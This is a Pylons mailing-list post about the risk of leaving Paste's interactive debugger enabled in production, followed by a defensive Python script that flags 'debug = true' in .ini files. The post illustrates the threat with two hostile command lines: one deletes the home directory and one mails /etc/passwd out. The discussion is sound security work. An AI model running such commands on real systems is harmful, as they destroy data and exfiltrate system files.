Paste's debug mode is great for debugging, since it allows you to
execute any Python code right on the machine.
Debug mode is controlled via a single variable in the server's ".ini"
file:
[DEFAULT]
debug = true
Remember to set this to false on the production server!
Imagine what would happen if you accidentally left this set to "true" on
the production server. Now anyone who causes a debug assertion can
execute ANY code on the host machine. For example, they could type
"import os; os.system('rm -rf ~')" or "os.system('cat /etc/passwd |
mail [email protected]')" right into the Paste debugger.
Is it true, then, that this one line in the config file can cause a
complete security disaster? This seems like there are not sufficient
safeguards, because it is easy to accidentally forget to properly set
this variable in the ini file. It gives me nightmares just thinking
about it.
Is there a better safeguard? Or do all Paste websites (such as reddit,
quora, and so on) share this potential security issue?
--
You received this message because you are subscribed to the Google Groups
"pylons-discuss" group.
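One safeguard for the mistake the post describes, added here as an example (not code from the post or from Paste itself): it reads a Paste-style .ini the way ConfigParser does and lists every section in which `debug` resolves to true, so it can be run as a pre-deployment gate. The set of truthy spellings and the sample ini contents are assumptions constructed for the example.

```python
"""Flag a Paste/Pylons-style .ini whose debug mode was left enabled.
Added example, not code from the original post or from Paste itself; it
assumes a ConfigParser-style .ini as Paste reads it, where [DEFAULT]
keys are inherited by every other section."""
import configparser
import io
import sys

# Assumption: the truthy spellings paste.deploy's asbool() accepts.
_TRUE = {"true", "yes", "on", "y", "t", "1"}


def asbool(value: str) -> bool:
    """Interpret an ini value the way Paste does ("True", "on", "1", ...)."""
    return value.strip().lower() in _TRUE


def find_debug_enabled(ini_text: str) -> list:
    """Return every section in which `debug` resolves to true.
    A `debug = true` in [DEFAULT] flags each section that does not
    override it, which is exactly the accident described in the post."""
    parser = configparser.ConfigParser(interpolation=None)  # keep %(here)s literal
    parser.read_file(io.StringIO(ini_text))
    return [name for name in ["DEFAULT"] + parser.sections()
            if parser.has_option(name, "debug")
            and asbool(parser.get(name, "debug"))]


# Constructed sample: a production.ini with the flag left on in [DEFAULT].
RISKY_INI = """\
[DEFAULT]
debug = true

[app:main]
use = egg:MyApp

[server:main]
use = egg:Paste#http
port = 8080
"""
# Constructed sample: the same file with the flag switched off.
SAFE_INI = RISKY_INI.replace("debug = true", "debug = false")

if __name__ == "__main__":
    # Deployment gate: `python check_debug.py production.ini` exits non-zero
    # when any section would start with the interactive debugger enabled.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else RISKY_INI
    hits = find_debug_enabled(text)
    print("debug enabled in: %s" % hits if hits else "debug is off everywhere")
    sys.exit(1 if hits else 0)
```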